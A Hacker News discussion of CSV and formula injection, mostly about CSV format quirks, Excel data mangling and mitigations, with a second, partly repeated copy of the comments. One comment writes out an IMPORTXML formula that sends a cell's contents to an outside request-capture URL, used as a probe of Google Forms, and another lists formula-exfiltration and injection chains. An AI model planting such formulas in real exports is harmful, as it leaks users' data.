Dangers of CSV Injection (opens in new tab)

(georgemauer.net)

645 pointsrpenm8y ago188 comments

188 comments

108 comments · 24 top-level

datenwolf8y ago· 14 in thread

The thing that puzzles me the most is, that people use _C_SV at all. Separation by comma, or any other member of the printable subset of ASCII in the first place. What this essentially boils down to is ambiguous in-band-signalling and a contextual grammar.

ASCII had addressed the problem of separating entries ever since its creation: Separator control codes. There are:

x01 SOH "Start of Heading"

x02 STX "Start of Text"

x03 ETX "End of Text"

x04 EOT "End of Transmission"

x1C FS "File Separator"

x1D GS "Group Separator"

x1E RS "Record Separator"

x1F US "Unit Separator"

You can use those just fine for exchanging data as you would using CSV, but without the ambiguities of separation characters and the need to quote strings. Heck if payload data is limited to the subset ASCII/UTF-8 without control codes you can just dump anything without the need for escaping or quoting.

So my suggestion is simple. Don't use CSV or "P"SV (printable separated values). Use ASV (ASCII separated values).

burntsushi8y ago

This comes up every single time someone mentions CSV. Without fail. The bottom line is that CSV is human readable and writable in plain text. If you start using fancy ASCII characters, then it becomes neither because our text editors don't support it.

ddevault8y ago

Let's send patches to text editors so they render fancy ASCII characters? I also find it amusing that "fancy ASCII characters" is even a statement that can make sense, there's only 127 ASCII characters!

2 more replies

paulie_a8y ago

Honestly I dispute that it is "human readable". It is sort of legible but incredibly inconvenient to read or manually write. They might be slightly more convenient than tabular files such as ACH or DDF

1 more reply

davedx8y ago

The article kind of addresses this. There are millions of spreadsheets and applications out in the wild that use CSV to communicate.

Sure, if you're building some kind of system where you need to ingest data from one application from another application you control, then using a different interchange format like ASV is an option. But then people tend to use more powerful formats like JSON or XML.

dspillett8y ago

> There are millions of spreadsheets and applications out in the wild that use CSV to communicate.

That, and data in CSV format is human readable in any old text editor or even work processor which many use as a quick sanity check to make sure their data looks sane. A lot of editors will not display the ASCII control characters at all so the fields on the line get mashed together, or may even reject the file as containing what it considers to be unexpected characters.

1 more reply

ajdlinux8y ago

Give me a version of every standard text editor that can let me display and edit these ASV files when I just need to quickly hack something, and sure, I'll use it. CSV is directly editable in any text editor and manipulable by standard text processing tools, that's one of its key advantages.

tluyben28y ago

I cannot remember how often, when I worked in 'enterprise software', we were sent CSV files by companies, and they were completely broken after someone 'simply edited' them with a 'standard editor'. More than a 1000x for sure over the years.

Worse; most 'non computer people' cannot get them imported into a spreadsheet properly (for whatever reason; usually it just puts everything in one field or column, people curse and give up), so they have to edit them in Notepad or worse, in MS Word and then send them back.

Not really seeing the beauty I guess.

1 more reply

datenwolf8y ago

How about Vim?

:help digraph

:help digraph-table

Feel free to implement mappings for quickly accessing these digraphs. Those pesky F<n> keys are perfect for this. Easy to reach, gets the job done.

1 more reply

emidln8y ago

Vim and Emacs can. If your editor can't, maybe it should get with the (54 year old) program.

2 more replies

eli8y ago

I don't think this necessarily addresses the security vulnerabilities in the article, which involve abusing the application reading the CSV, not the file format itself.

If Excel decides that text between Start of Text and End of Text that begins with a "=" is a formula, then you're in the same spot.

baldfat8y ago

I am happy when I see I can get data via CSV over the other delivery methods people use. My local school board prints out all their data and then scans them into a PDF, ugh. I had one vendor that on purpose made the data only available in forms that would take me 600+ lines of code to clean up in mangled ASCII format.

I use CSV all the time when I am working with R. My data can come in the form of CSV, XLS, or PDF. Which would you want to work with?

I can easily look at the data. I never touch my incoming data and my output is in reports, but CSV can be the easiest way to get data into a computer.

mnx8y ago

Actually, XLS is not bad to work with, if you have a library for it. And it's well defined, unlike CSV. Insofar as I know, there's no way to make a CSV file that will open and show nicely in all popular versions of excel / google docs/ open office, especially across language settings. And a well formed XLS file will just work.

sbierwagen8y ago

If a dev is going to use a weirdo non-CSV data interchange format, they would just use XSLX or JSON or etc etc etc.

"ASV" is only a viable option if you then also use your time machine to go back 40 years and make everyone start using it then.

thepompano8y ago

This might create some integration-related hiccups with XML, as most ASCII control characters are forbidden per the XML 1.0/1.1 specs.

pavel_lishin8y ago· 13 in thread

Excel is the source of so many problems. At work, we ask users for an input in CSV or Excel format, and most people see "CSV" and export Excel data as CSV. Which is fine and great, but long numbers - such as UPCs - show up in Excel as scientific notation, being big scary numbers, and also get exported as such.

So when an Excel cell contains the UPC 123456123456, we get a CSV file that contains "1.23456E+11", which is worse than useless.

pc868y ago

I used to work in third-party logistics and a big project of mine was an automated file import process, so folks could send us their daily/hourly orders for processing and fulfillment. I'd say roughly 65-70% of the entire code base was error handling and figuring out when to kick out a file for human review and/or outright deny it and contact the customer.

The hardest ones to work with were the mom and pop shops who suddenly had some success on Amazon and came to us after fulfilling out of their garage for a year and a half. Try telling a semi-retired 60 year old electrician in the middle of Iowa that the file he sent is worthless because none of the product codes match what you have, especially when once he closes the file he doesn't have any idea where it is.

mratzloff8y ago

A long time ago I did the same work with banks. The effect was the same. It was amazing to me how bank employees could somehow find a way to regularly insert ASCII control characters into a CSV value.

1 more reply

pavel_lishin8y ago

These are the exact problems we're banging our heads against.

The worst part is that it's not something that can be solved with an external dependency on some new startup - that would just add another layer we'd have to go through in the error cases, which would be numerous.

God, I wish I could share some of the files we've received. I cannot conceive what sort of monster would write a data exporter that would produce these unreadable things.

geocar8y ago

CSV is the source of so many problems. CSV has no character set, no rule for escaping double-quotation marks, commas, and newlines. There's not even a way to look at a CSV file and tell what it's "rules" are beyond heuristics and those only take you so far.

I ask for XLSX files since at least it's structured, unambiguous and documented, but even better: a minimal XLSX parser is trivial (about a page) to write.

Also: Educating users on how to specify the character set in every application that the user seems to want to use is a special kind of hell.

PaulHoule8y ago

I'd say that the spreadsheet model is long in the tooth, but there has been a failure of will in the industry to kill it.

People use Excel when they should really use a database, they use it because they want to format something on a 2-d grid, edit tabular data, make plots, do calculations, make projections, etc.

The problems go down to the data structures in use.

For instance there is nothing 2-dimensional about financial reports (and projections), really financial reports are hyperdimensional. Proper handling of dates and times is absolutely critical. Also the use of floating point with a binary exponent is a huge distraction in any kind of math tools aimed at ordinary people. (Mainframes got that right in the 1960s!)

Google Sheets is just a stripped down version of Excel and other than the ability for multiple people to work on it simultaneously, is really no better.

2 more replies

dvlsg8y ago

Rfc 4180 definitely lays out rules for how to escape double quotes, commas, and newlines.

3 more replies

daveheq8y ago

I've used several different characters for escaping, though I don't know why backslash (\) isn't the default universal one. It seems pretty sensible, it's used across multiple scripting languages and CLIs. If you need to escape a backslash, you escape it with a backslash.

2 more replies

rattray8y ago

Does xlsx suffer from the same vulnerabilities?

What are the downsides of using it for ~everything?

3 more replies

jhbadger8y ago

Excel is also well known for mangling gene names in expression data. No, SEPT2 (Septin-2) shouldn't be silently "corrected" to 2-Sep, but it is...

aqme288y ago

Zip codes also have a bad habit of getting reformatted, because leading zeroes are removed.

01101 -> 1101

ajanuary8y ago

Export side you obviously can't control :( But on import, if you use Data -> From Text, and on Step 3 select all the columns and make them "Text", that will prevent Excel from mangling any of the data (stripping leading zeros, evaluating strings starting with = as formula etc.)

danhess688y ago

Really quite rich people relying on Excel for economic world-scale critical stuff has ruined/cost more than a few lives. Do you blame Bill for his shitty software or do you blame the rich corporate types for not giving a shit/incompetent minimum effort IT?

danhess688y ago

If you run your bank/brokerage off a fucking spreadsheet then maybe you don't deserve those six bars p.a.

kristofferR8y ago· 13 in thread

CSV is hell. Some idiot somewhere decided that Comma Separated Values in certain locales should be based on semicolons (who would have thought files would be shared across country borders!?), so when we open CSV files that are actually comma separated all the information is in the first cell (until a semicolon appears).

To get comma separated CSVs to show properly in Excel we have to mess around with OS language settings. CSV as a format should have died years ago, it's a shame so many apps/services only export CSV files. Many developers (mainly US/UK based) are probably not aware of how much of a headache they inflict on people in other countries by using CSV files.

erik_seaberg8y ago

A CSV importer absolutely needs to be configurable. I've seen delimiters including tabs, vertical bars, tildes, colons, and random control characters (they didn't even choose RS and US).

kristofferR8y ago

I shouldn't have to resort to arcane concepts like importing files to get them to display properly when people in other locales can just open them.

Piskvorrr8y ago

Good luck with configuration if your CSV parser is ten layers removed from any human, and still needs to get it right. Now what? (Now we guess. We call it "heuristics," of course.)

viraptor8y ago

> CSVs to show properly in Excel we have to mess around with OS language settings.

Why? Aren't the import settings enough?

https://support.office.com/en-us/article/Text-Import-Wizard-...

kristofferR8y ago

That copies the data from the CSV file into a worksheet, you aren't editing the CSV file anymore.

I'm not just being pedantic, it makes a big difference. If I want to change some values in a spreadsheet I should be able to just open it, change the values, save, and be certain that the document will be identical apart from the deliberate changes. This is especially important for CSV files, which are commonly used for import/export operations.

1 more reply

seszett8y ago

> Some idiot somewhere decided that Comma Separated Values in certain locales should be based on semicolons

Semicolons are really better though, because they aren't used as a decimal separator unlike commas in most countries.

I don't know about Excel, but LibreOffice allows very easily to select which parameters to use when opening a CSV file, it works just fine.

PhasmaFelis8y ago

> Semicolons are really better though, because they aren't used as a decimal separator unlike commas in most countries.

If you're going to separate values with semicolons--which is perfectly reasonable--I feel like you probably shouldn't do that with a format called Comma Separated Values.

mulmen8y ago

Picking a less-common separator might help but you could also just follow RFC 4180 and quote fields that have commas then double any single quotes in values.

mark-r8y ago

You can also use the file import wizard in Excel to make similar choices. But that's not the default behavior for files with a .csv extension.

pvdebbe8y ago

The only good CSV dialect is the dif-named DSV (Delimiter Separated Values) where you select and support just one supported delimiter, and you require escaping of the delim character inside values. It's simple, it works. Quotes are hard to parse so don't use those. Just \escape.

http://www.catb.org/esr/writings/taoup/html/ch05s02.html

Raticide8y ago

What's a good alternative non-proprietary format that all major spreadsheet software supports?

kristofferR8y ago

Unicode is vast. There's absolutely no good reason we don't have Snowman Separated Values (or some other proper separator sign that isn't commonly used elsewhere) other than that people don't demand it.

2 more replies

Piskvorrr8y ago

While XLSX is proprietary by descent, it is standardized; thus, it's readable/writable by man and machine alike (essentially a zipped XML with some bells and whistles). I have not encountered a less broken format that is similarly widespread.

1 more reply

Dylan168078y ago· 12 in thread

> Well, despite plentiful advice on StackOverflow and elsewhere, I’ve found only one (undocumented) thing that works with any sort of reliability: For any cell that begins with one of the formula triggering characters =, -, +, or @, you should directly prefix it with a tab character.

>Unfortunately that’s not the end of the story. The character might not show up, but it is still there. A quick string length check with =LEN(D4) will confirm that.

The documented way is prefixing with a ' character. It doesn't have the length issue either.

As to the root issue, I can't think of any perfect way to transfer a series of values between applications that apply different types to those values and applications that don't. At some point, something is going to have to guess.

autra8y ago

> The documented way is prefixing with a ' character. It doesn't have the length issue either.

It is suggested in comments, but the author answered

> Yes, this prevents formula expansion... once. Unfortunately Excel's own CSV exporter doesn't write the ', so if the user saves the ‘safe’ file and then loads it again all the problems are back.

:-/

smhenderson8y ago

That's it. My pet peeve issue with Excel/CSV is USA zip codes. Excel will happily eat leading zeros. There is a specific number format to correct that. If you export that file to CSV with the format set the CSV file will have 5 digits. If you reopen that CSV file in Excel it gobbles up the zeros all over again.

As someone mentioned elsewhere this is an issue with long numbers. Excel converts them to scientific notation. Reformat and export, all good. Reopen said file, back to scientific notation.

Really anything that relies on an escape character (') or a specific format gets lost on export to CSV. It exports correctly but there is simply no way to document these formats in a CSV file and have it be compatible with anything but Excel.

3 more replies

noobermin8y ago

Sounds to me like the elephant in the room is using Excel in the first place, despite how entrenched it is.

Dylan168078y ago

So data entered safely into Excel, exported from Excel, and imported back into Excel... can inject code.

Amazing.

1 more reply

rattray8y ago

Does that occur with the tab character?

ballenf8y ago

Came here to say the same. Also tested it to confirm and the single quote mark inside the double quotes does indeed force interpretation as a string instead of a formula. In both Excel and Google Sheets.

Interestingly, in Excel removing the quotes entirely also causes a formula to be interpreted as a formula and text (even with spaces) as text and numbers as numbers.

In my testing, quotes are only needed when a field contains a comma to prevent it being interpreted as a delimiter.

cturner8y ago

"transfer a series of values between applications that apply different types to those values and applications that don't"

If we thought about it as an API mechanism, we would parse the strings and apply rules to sanitise or reject it.

Here is a principle for thinking about data. Distinguish internal data structures (persistence, search) from interchange structures (APIs). Codebase A should not be able to directly access the structures of Codebase B. To communicate, they must use explicit APIs.

At the moment, this principle is not mainstream. The CSV loader is not sure if it is loading an interchange format or persistence format. Another, that happens regularly: (1) developer builds a database as a storage mechanism. (2) developer decides to have other separate codebases query into that database. Is the database an application-data-structure (interal) or an API (external)? It is acting as both.

mulmen8y ago

The applications that are communicating either have to agree on the types in advance or they have to use an interchange format that makes it explicit. If your applications don't both know the types in advance then you shouldn't be using CSV.

fulafel8y ago

I think the common model people had of CSV was that it was an imperfect way to transfer values, but safeish from code execution, XSS or "all your Google account data gets exfiltrated" type effects.

mulmen8y ago

The problem isn't with CSV, it is with spreadsheet applications.

2 more replies

jdelStrother8y ago

That's just a single regular apostrophe? At least on my machine, with Mac Excel 15.38, if I have a CSV containing:

1,foo,'=SUM(A1:A10),bar

and open it, then the single apostrophe is visible in the cell.

elliottcarlson8y ago

You should actually append it to the trigger; i.e.

1,foo,='SUM(A1:A10),bar

fulafel8y ago· 6 in thread

This is foremost a vulnerability in Excel and Google Sheets, like the article concludes, though it warrants workarounds in CSV producers.

Why would these apps go off executing code from a text file? How odd.

Is there a way to tell Excel or Sheets to open a CSV file without executing code?

sanotehu8y ago

Yes, through the "Import" feature. Excel will in that case allow you to choose what "type" each column in the CSV has (and will not parse text if given the "text" type). The problem is that a lot of users (myself included) will use muscle memory and double-click a CSV file in windows explorer rather than opening up Excel and initiating an import.

yjftsjthsd-h8y ago

So why does it not import when opening files?

1 more reply

pbhjpbhj8y ago

So a safe-import could import all columns as text (without interpretation) and offer to parse columns with a predictive input type suggestion.

cm21878y ago

Agree it is completely absurd to allow formulas in a CSV file, let alone code.

I have never seen a way to disable a full recalculation when Excel opens a CSV file, which beyond the security implications is painful for people like me who keep their calculations on manual because I often have very heavy workbooks opened all the time.

matt_kantor8y ago

My first thought was this dead-simple solution: just pop up a prompt when opening CSVs. "Do you want to run formulas from this CSV file?" No need for complicated import wizards, just a simple yes/no.

pbhjpbhj8y ago

"Yes/no/always/always for all files (see settings>blah>foo to change this option" would seem more user friendly to me, or is that too many options?

1 more reply

bitexploder8y ago· 5 in thread

I have been finding this vulnerability in apps since I started in infosec 10 years ago. I have seen it go any number of ways:

CSV -> import on web app -> SQLi

Malicious input -> CSV download from web app -> Excel -> formula -> sneaky data exfil

CSV -> JS -> import into web app XSS (in places no other XSS existed because of the data)

CSV import -> weird CSV header -> arbitrary data loading (headers were column names.... Schema injection .. like SQLi only more hilarious

Point is apps and devs can have blind spots (knowledge gaps) or just not think of a CSV import or export like other functionality.

e1g8y ago

We recently went through an external pentest simulating a hostile actor with inside information. We had 2 weeks to prepare and successfully defended against timing attacks, DDoS attempts, identity spoofs, request modifications, script injections etc. Passed with flying colors... except for CSV/Excel injection. Everyone looked at each other with the sheepish embarrassment of being pwned by a script kiddie. This was a total blind spot indeed, even after we reviewed every other user I/O.

f00_8y ago

>defend against DDoS but not sanitizing user input

>calling a pentested a script kiddie

welp, my work is done here

1 more reply

captn3m08y ago

Were you generating CSVs or importing them?

1 more reply

IncRnd8y ago

"Input is evil" is a pretty good maxim to follow.

marcosdumay8y ago

Yet, nobody ever expects the CSV to be.

1 more reply

TAForObvReasons8y ago· 5 in thread

CSV is a pretty poor format in that it mixes the presentation and the underlying values. There is no standard for dates (dd/mm/yyyy or mm/dd/yyyy ?). The "standard" RFC4180 is extremely vague when discussing value interpretation. As proprietary as XLSX is, at least the Excel format separates the raw values from the presentation.

pmoriarty8y ago

There's nothing in CSV that has anything to do with presentation (nor with what the underlying values are, for that matter).

These vulnerabilities can't be blamed on CSV so much as on the desire of application vendors to treat data as code.

Dylan168078y ago

CSV is a format for two-dimensional text values, and nothing beyond that. It's not a poor format, it's a simple low-level format.

mulmen8y ago

Except if your raw value begins with a "'". Or if it is 2017/10/10, or 10/10/2017, then it may be represented by an integer with a format of "date". Or if your raw value is 1234567890123456789, then you get a string like '1.23456789012345e18', complete with modified data. Or if it begins with an "=" which could result in basically anything as the article points out.

Excel conflates the idea of display format and data type which is the source of countless headaches. It is legacy pain in the purest form.

mjevans8y ago

CSV was only ever intended to store simple text and simple numbers.

Dates are a /type/ of text; parsing dates in to machine readable formats is an /entire/ other can of spam.

cozzyd8y ago

It would be interesting if spreadsheets supported a sub-set of a binary interchange format like FITS or HDF5.

splike8y ago· 4 in thread

Interestingly, genetic biologists are probably more aware of this problem than most. When importing a CSV containing gene names such as SEPT2 or MARCH1, they automatically get converted to dates by Excel. This has potentially had a fairly large effect on research in the area [1]. One of the many reasons we insist on only using Ensembl IDs for genes at my company.

[1] https://genomebiology.biomedcentral.com/articles/10.1186/s13...

sixbrx8y ago

I noticed this in the data of some scientists I work with. Another awful thing is that when you tell them they need to format the column as text to prevent this in the future, before the data is put in the column (very important!), they'll eventually try to apply it to their existing fubar spreadsheets as well - in which case the "date-recognized" genes become ... large numbers representing the number of days since 1900, totally unrecognizable.

krylon8y ago

FWIW, I (not a biologist, though) only use LibreOffice for importing CSV these days. It allows me to look at the fields first and tell it if I want to suppress special treatment of data in a column.

EDIT: LibreOffice also allows you to tell it what encoding a file uses and what character(s) are used as separators.

xelxebar8y ago

Just curious, but what about non-vertebrates? I'd have expected there to be an official number/hash that identifies genes like the InChI Key for chemistry or something. IIRC, that key in particular is just a SHA-256 of a long human-readable "chemical formula".

splike8y ago

We'll cross that bridge when we come to it I guess, but we work almost exclusively with human and mouse genomes for now.

In any case, I imagine the Ensembl ID is still safer than other encodings in the case of invertebrates. For example, genes IDs in the Fruit fly genome look like FBgn0034730.

jkabrg8y ago· 4 in thread

Slightly off-topic, but maybe we need a fully standardized and unambiguous CSV dialect with its own file extension. Or maybe just use SQLite tables or Parquet?

Some things I dislike about CSV:

* No distinction between categorical data and strings. R thinks your strings are categories, and Pandas thinks your categories are strings.

* I'm not a fan of the empty field. Pandas thinks it's a floating point NaN, while R doesn't. So is it a NaN? Is it an empty string? Does it mean Not Applicable? Does it mean Don't Know? Maybe it should be removed altogether.

* No agreement about escape characters.

* No agreement about separator characters.

* No agreement about line endings.

* No agreement about encoding. Is it ASCII, or UTF-8, or UTF-16, or Latin-whatever?

* None of the choices above are made explicit in the file itself. They all have the same extension "CSV".

These use up a bit of time whenever I get a CSV from a colleague, or even when I change operating system. Sometimes I end up clobbering the file itself.

Good things: * Human readable. * Simple.

I think the addition of some rules, and a standard interpretation of them, could go some way to improving the format.

kqr8y ago

See, one of the reasons CSV managed to get so ubiquitous is precisely because all those things are unspecified. CSV is not a popular format; CSV is the name we give 960 visually similar but very different formats that as a collective are popular.

The thing you use CSV for is not it's technical merit. You use CSV for its ubiquity. If you nailed down all those things you talk about, you would have a much, much smaller user base and there would be no reason to use CSV in the first place.

(Hey, this reminds me of a similar situation governing s/CSV/C/g...)

johnwilkesbooth8y ago

> No distinction between categorical data and strings. R thinks your strings are categories, and Pandas thinks your categories are strings.

I think this is more of an R-ism than a standardization issue. Strings are a pretty universal data type, where as categorical data (factors) are mostly specific to the domain of statistical modeling. IMO Python is doing the correct thing here. Personally I find factors to be more trouble than they are worth, and fortunately `data.table::fread` mimics Python in this regard.

f00_8y ago

.parquet fam, it's all about columnar data stores now

tomc19858y ago

XKCD covered this: https://xkcd.com/927/

top_post8y ago· 2 in thread

Sorry to balk, but I'm more outraged at the title, another injection I need to talk about that isn't really the case. The root cause is the interpreter executing untrusted input, the same can be said about macros or any other file type. The perception being most people open CSV files on a regular basis and perceive them to be safe or not interpreted when it appears they are.

bitexploder8y ago

Well, it catches folks by surprise. We could abstract all computer vulns down to a few broad computing concepts, but that isn't as useful.

This one is your data turned out to be code. There are many, many books on all the various forms this takes. Memory corruption cat and mouse..... It is a long complex story that we can sweep up to that generalization. But it is important to know that high, medium, and low level of these issues. They form a gigantic tree. The medium level somewhere between is where devs need to threat model most of the time. But some of the time things are very specific and you just need to know about the specific thing and not it's various generalized forms, because the specific thing can really matter. E.g. simple programming mistakes lead to side channels, etc. We can generically understand a side channels easily. But it takes a ton of specific hard earned knowledge to avoid it.

top_post8y ago

It kind of is more useful to abstract them, so we're not whack-a-moling the current hype or hot title of the day and can focus on the fundamental issues.

I agree, it catches people off guard to think CSV files once interpreted can do more than give columns of information, but it's not an injection which is my beef.

1 more reply

ComodoHacker8y ago· 2 in thread

My Excel 2010 doesn't execute shell code from author's example. Heck, it doesn't even parse CSV and loads everything into one column as text. What am I doing wrong?

randkyp8y ago

As weird as it sounds, it might be related to your system region settings, specifically the decimal point sign and the thousands separator sign. I've been only able to open CSVs by manually importing them with Excel's 'import data from text file' function.

tyingq8y ago

It does depend on using the csv file extension. Anything else brings up the import wizard.

hutch1208y ago· 2 in thread

Little Bobby Tables reminds us to sanitize our database inputs.

https://imgs.xkcd.com/comics/exploits_of_a_mom.png

billpg8y ago

That's bad advice.

http://blog.hackensplat.com/2013/09/never-sanitize-your-inpu...

trishmapow28y ago

Expected something revolutionary, turned out to be an argument over semantics...

1 more reply

Swizec8y ago· 1 in thread

This brings XSS to a whole new level. Imagine what happens if you know some of what you post in a website as a user eventually gets reviewed by somebody who gets it through a CSV dump.

Makes me wanna troll ops people at my own startup just for funsies.

_betty_8y ago

this used to be common with txt files and IE's terrible practice of sniffing content. It would see a txt file that contained html and display the html instead, it could then pull in a secret silverlight file that was mascarading as a docx file as they are both simply zip files. Even more amusingly silverlight and docx contents don't clash so it could still be a valid docx file if you opened it, and the txt file would look like txt even though it was really rendering html with a hidden silverlight app.

beached_whale8y ago· 1 in thread

Excel protects for this, at least mine does v2013

Piskvorrr8y ago

As mentioned, protects by showing a wall of text with "yes" preselected at bottom; equally useless and annoying.

Cyranix8y ago

This seems like an appropriate place to suggest that anyone who finds these kinds of attack vectors interesting should check out the bug bounty program for my current place of work, which processes loads of CSV and Excel files from government customers.

https://bugcrowd.com/socrata

(But please, just do me a small favor and don't submit any reports for SQL injection or information disclosure if you're using the SQL-like API that we expressly provide for the purpose of accessing public data. We get a couple clueless people sending such reports every week.)

Mortiffer8y ago

Incase anyone else was wondering about Google Forms : I tried inputting =IMPORTXML(CONCAT("https://requestb.in/15z4vk51?f=",H8),"//a") into a text field and google automatically appends a "'" such that '=IMPORTXML does not execute

jaclaz8y ago

At least here (Italy) CSV is not commonly used (because of the different way we use the comma as a decimal point) and the default (in Excel) separator is then set to a semi-colon.

A more common format is TSV (TAB delimited) which makes a lot more sense, however the best choice when importing data in Excel is still to change the file extension to a non-recognized extension (like - say - .txt) and in the "import wizard" set the appropriate separator and set all columns as "text".

captn3m08y ago

On the first attack vector: Google Security has a nice post about it [0] and why they do not consider it a valid threat. This is their reasoning:

>CSV files are just text files (the format is defined in RFC 4180) and evaluating formulas is a behavior of only a subset of the applications opening them - it's rather a side effect of the CSV format and not a vulnerability in our products which can export user-created CSVs. This issue should mitigated by the application which would be importing/interpreting data from an external source, as Microsoft Excel does (for example) by showing a warning. In other words, the proper fix should be applied when opening the CSV files, rather then when creating them.

[0]: https://sites.google.com/site/bughunteruniversity/nonvuln/cs...

Their policy makes it sound like that the second vulnerability should indeed be fixed in Google Sheets itself (it is the one opening the file, after all)

jonnycomputer8y ago

CSV is a mess (are a mess?), but all these vulnerabilities have to do with spreadsheet applications' consumption of CSVs. There are very legitimate reasons a CSV might include fragments of potentially executable code, after all.

filereaper8y ago

I'd be curious if anyone has hit exploits with CSV files and bulk ingestion into datawarehouses (eg Redshift, Greenplum, etc..) as opposed to Excel.

CSVs are still the most portable format for moving data around despite all of their evils of escaping characters, comma delimitation, etc...

A lot of old legacy systems know CSV and its easy to inspect visually as compares to more efficient binary formats like ORC or Paquet.

tatersolid8y ago

Like it or not, Excel’s behavior defines the CSV file format and how it is used in the real world. The writing of an RFC 15 years too late has not and will never “fix” CSV. It’s crusted over over with bugs and inconsistencies for all time.

Use anything else, even XLSX which is at least a typed and openly standardized format.

stepri8y ago

When you import a CSV file into Google Sheets (File -> Import), you can choose in the dialog to convert text to numbers and dates. If you choose not to convert, Google Sheets places a single quote (') before the function.

ecesena8y ago

Does anybody know any good library that solve the problem, in any language?

jasonmaydie8y ago

Shouldn't this be the dangers of Excel? CSVs are benine

j / k navigate · click thread line to collapse

188 comments

108 comments · 24 top-level

datenwolf8y ago· 14 in thread

ASCII had addressed the problem of separating entries ever since its creation: Separator control codes. There are:

x01 SOH "Start of Heading"

x02 STX "Start of Text"

x03 ETX "End of Text"

x04 EOT "End of Transmission"

x1C FS "File Separator"

x1D GS "Group Separator"

x1E RS "Record Separator"

x1F US "Unit Separator"

So my suggestion is simple. Don't use CSV or "P"SV (printable separated values). Use ASV (ASCII separated values).

burntsushi8y ago

ddevault8y ago

2 more replies

paulie_a8y ago

1 more reply

davedx8y ago

The article kind of addresses this. There are millions of spreadsheets and applications out in the wild that use CSV to communicate.

dspillett8y ago

> There are millions of spreadsheets and applications out in the wild that use CSV to communicate.

1 more reply

ajdlinux8y ago

tluyben28y ago

Not really seeing the beauty I guess.

1 more reply

datenwolf8y ago

How about Vim?

:help digraph

:help digraph-table

Feel free to implement mappings for quickly accessing these digraphs. Those pesky F<n> keys are perfect for this. Easy to reach, gets the job done.

1 more reply

emidln8y ago

Vim and Emacs can. If your editor can't, maybe it should get with the (54 year old) program.

2 more replies

eli8y ago

I don't think this necessarily addresses the security vulnerabilities in the article, which involve abusing the application reading the CSV, not the file format itself.

If Excel decides that text between Start of Text and End of Text that begins with a "=" is a formula, then you're in the same spot.

baldfat8y ago

I use CSV all the time when I am working with R. My data can come in the form of CSV, XLS, or PDF. Which would you want to work with?

I can easily look at the data. I never touch my incoming data and my output is in reports, but CSV can be the easiest way to get data into a computer.

mnx8y ago

sbierwagen8y ago

If a dev is going to use a weirdo non-CSV data interchange format, they would just use XSLX or JSON or etc etc etc.

"ASV" is only a viable option if you then also use your time machine to go back 40 years and make everyone start using it then.

thepompano8y ago

This might create some integration-related hiccups with XML, as most ASCII control characters are forbidden per the XML 1.0/1.1 specs.

pavel_lishin8y ago· 13 in thread

So when an Excel cell contains the UPC 123456123456, we get a CSV file that contains "1.23456E+11", which is worse than useless.

pc868y ago

mratzloff8y ago

1 more reply

pavel_lishin8y ago

These are the exact problems we're banging our heads against.

God, I wish I could share some of the files we've received. I cannot conceive what sort of monster would write a data exporter that would produce these unreadable things.

geocar8y ago

I ask for XLSX files since at least it's structured, unambiguous and documented, but even better: a minimal XLSX parser is trivial (about a page) to write.

Also: Educating users on how to specify the character set in every application that the user seems to want to use is a special kind of hell.

PaulHoule8y ago

I'd say that the spreadsheet model is long in the tooth, but there has been a failure of will in the industry to kill it.

People use Excel when they should really use a database, they use it because they want to format something on a 2-d grid, edit tabular data, make plots, do calculations, make projections, etc.

The problems go down to the data structures in use.

Google Sheets is just a stripped down version of Excel and other than the ability for multiple people to work on it simultaneously, is really no better.

2 more replies

dvlsg8y ago

Rfc 4180 definitely lays out rules for how to escape double quotes, commas, and newlines.

3 more replies

daveheq8y ago

2 more replies

rattray8y ago

Does xlsx suffer from the same vulnerabilities?

What are the downsides of using it for ~everything?

3 more replies

jhbadger8y ago

Excel is also well known for mangling gene names in expression data. No, SEPT2 (Septin-2) shouldn't be silently "corrected" to 2-Sep, but it is...

aqme288y ago

Zip codes also have a bad habit of getting reformatted, because leading zeroes are removed.

01101 -> 1101

ajanuary8y ago

danhess688y ago

If you run your bank/brokerage off a fucking spreadsheet then maybe you don't deserve those six bars p.a.

kristofferR8y ago· 13 in thread

erik_seaberg8y ago

A CSV importer absolutely needs to be configurable. I've seen delimiters including tabs, vertical bars, tildes, colons, and random control characters (they didn't even choose RS and US).

kristofferR8y ago

I shouldn't have to resort to arcane concepts like importing files to get them to display properly when people in other locales can just open them.

Piskvorrr8y ago

Good luck with configuration if your CSV parser is ten layers removed from any human, and still needs to get it right. Now what? (Now we guess. We call it "heuristics," of course.)

viraptor8y ago

> CSVs to show properly in Excel we have to mess around with OS language settings.

Why? Aren't the import settings enough?

https://support.office.com/en-us/article/Text-Import-Wizard-...

kristofferR8y ago

That copies the data from the CSV file into a worksheet, you aren't editing the CSV file anymore.

1 more reply

seszett8y ago

> Some idiot somewhere decided that Comma Separated Values in certain locales should be based on semicolons

Semicolons are really better though, because they aren't used as a decimal separator unlike commas in most countries.

I don't know about Excel, but LibreOffice allows very easily to select which parameters to use when opening a CSV file, it works just fine.

PhasmaFelis8y ago

> Semicolons are really better though, because they aren't used as a decimal separator unlike commas in most countries.

If you're going to separate values with semicolons--which is perfectly reasonable--I feel like you probably shouldn't do that with a format called Comma Separated Values.

mulmen8y ago

Picking a less-common separator might help but you could also just follow RFC 4180 and quote fields that have commas then double any single quotes in values.

mark-r8y ago

You can also use the file import wizard in Excel to make similar choices. But that's not the default behavior for files with a .csv extension.

pvdebbe8y ago

http://www.catb.org/esr/writings/taoup/html/ch05s02.html

Raticide8y ago

What's a good alternative non-proprietary format that all major spreadsheet software supports?

kristofferR8y ago

2 more replies

Piskvorrr8y ago

1 more reply

Dylan168078y ago· 12 in thread

>Unfortunately that’s not the end of the story. The character might not show up, but it is still there. A quick string length check with =LEN(D4) will confirm that.

The documented way is prefixing with a ' character. It doesn't have the length issue either.

autra8y ago

> The documented way is prefixing with a ' character. It doesn't have the length issue either.

It is suggested in comments, but the author answered

> Yes, this prevents formula expansion... once. Unfortunately Excel's own CSV exporter doesn't write the ', so if the user saves the ‘safe’ file and then loads it again all the problems are back.

:-/

smhenderson8y ago

As someone mentioned elsewhere this is an issue with long numbers. Excel converts them to scientific notation. Reformat and export, all good. Reopen said file, back to scientific notation.

3 more replies

noobermin8y ago

Sounds to me like the elephant in the room is using Excel in the first place, despite how entrenched it is.

Dylan168078y ago

So data entered safely into Excel, exported from Excel, and imported back into Excel... can inject code.

Amazing.

1 more reply

rattray8y ago

Does that occur with the tab character?

ballenf8y ago

Interestingly, in Excel removing the quotes entirely also causes a formula to be interpreted as a formula and text (even with spaces) as text and numbers as numbers.

In my testing, quotes are only needed when a field contains a comma to prevent it being interpreted as a delimiter.

cturner8y ago

"transfer a series of values between applications that apply different types to those values and applications that don't"
